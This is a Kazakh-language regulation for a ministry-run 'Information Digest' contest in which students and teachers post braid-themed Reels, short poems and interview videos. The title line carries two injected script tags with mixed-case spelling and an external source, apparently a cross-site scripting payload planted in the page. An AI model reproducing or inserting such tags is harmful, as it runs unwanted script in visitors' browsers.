Білім беру ұйымдарының білім алушылары мен педагогтеріарасындағы «Ақпараттық дайджест»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
Білім беру ұйымдарының білім алушылары мен педагогтеріарасындағы
«Ақпараттық дайджест»
ЕРЕЖЕ
1- ТАРАУ. ЖАЛПЫ ЕРЕЖЕ
- Осы Ереже облыстықбілім алушылары мен педагогтері арасында«Ақпараттық дайджест»өткізу және оған қатысу тәртібі мен шарттарын айқындайды.
- Ақпараттық дайджест:
- Reels (қысқа бейне ролик)«Бұрымды қыз» челенджі – қыз сұлулығы мен мәдениеттілігінің белгісін көрсету;
- «Поэзия әлемі» - 2-4 шумақтан тұратын өлең;
- «Бейнероликтер антологиясы» - тәрбиеге байланысты түсірілген қысқа бейне роликтер;
- «Жақсының жақсылығын айт» - әркім өз өңірінің, аудан,қала,ауылының жақсылығымен елге танымал адаммен интервью жүргізугебағытталған.
- Ақпараттық дайджесттіҚР Оқу-ағарту Министрлігі Тәрбие жұмысы және қосымша білім департаменті (бұдан әрі - Департамент)өткізеді.
- Ақпараттық дайджестке білім беру ұйымдарының білім алушылары мен педагогтеріқатыса алады.
- Мақсаты және міндеттері
Мақсаты:
«Біртұтас тәрбие бағдарламасы» аясында түсіндірілетін ұлттық құндылықтарды дәріптеу, жас ақындарды анықтау, педагогтердің шығармашылығына қолдау көрсету.
Міндеттері:
- «Біртұтас тәрбие бағдарламасы» аясында түсіндірілетін ұлттық құндылықтарды дәріптеу;қыз сұлулығы мен мәдениеттілігінің белгісін көрсету, эстетикалық талғамдарынанықтау;
- оқушылардың шығармашылық қабілеттерін, эстетикалық талғамдарын, дарындарын анықтау;
- оқушылардың поэзияға, шешендік өнерге деген құштарлығын арттыру, өлең мен шешендіксөздердің құдіреті мен қуатын жанымен сезініп, жүрегімен түсіне білуге үйрету;
- жастар жиі пайдаланатын әлеуметтік желілерде ұлттық құндылықтарымызды дәріптеу.
- қатысушылардың міндеттері:
- Reels-те(қысқа бейне ролик) қыз балаларының бұрымының сұлулығын, оның мәдениеттілігінің белгісін, эстетикалық талғамдарынкөрсету;
- жас ақындар мен ақын педагогтер Біртұтас тәрбие бағдарламасының ұлттық құндылықтарына негізделген (мысалы,әдептілік, әділеттілік, адалдық, отаншылдық, қамқорлық, жауапкершіліксөздерін құрайтын) 2-4 шумақтан тұратын өлең құрастыруы тиіс;
- әркім өз өңірінің, аудан, қала, ауылының жақсылығымен елге танымал адаммен интервью жүргізіп, креативті бейне ролик түсіру;
- қатысушылар белгіленген уақыттан кешікпей материалды жариялауы тиіс;
- әдеп нормаларын сақтауы қажет.
2-ТАРАУ. БАЙҚАУДЫӨТКІЗУ ТӘРТІБІ
2.1. Ақпараттық дайджестке кез-келген педагог және білім алушы сынып жетекшінің жетекшілігімен ерікті түрде, жеке дара қатысады.
2.2.Reels-ті, өлең шумақтарын, бейнероликтерді Facebook, Instagram, Tik-Tok әлеуметтік желілеріне #Біртұтас_тәрбие хэштегінтегтеп, Оқу-ағарту Министрлігін белгілей отырып, оқу жылының соңына дейін жариялап отыруы тиіс. Сонымен қатар, бейнероликтердіYoutube каналына жүктеу, ұсынылады.
2.3.Бағалау, жеңімпаздарын анықтау
- бағалау, жеңімпазды анықтау желі пайдаланушылардыңжағымды пікір қалыптастыру арқылы жүргізіледі;
Жұмыстың:
- креативтілігі;
- жаңашылдығы;
- өзектілігі;
- видеороликті түсіру сапасы бағаланады.
2.4. Reelsті қорытындылау және жеңімпаздарды марапаттау
Әр тоқсан соңында жұмыстар сараланыпматериалдар жинағына енгізіледі,Департамент дипломымен марапатталады.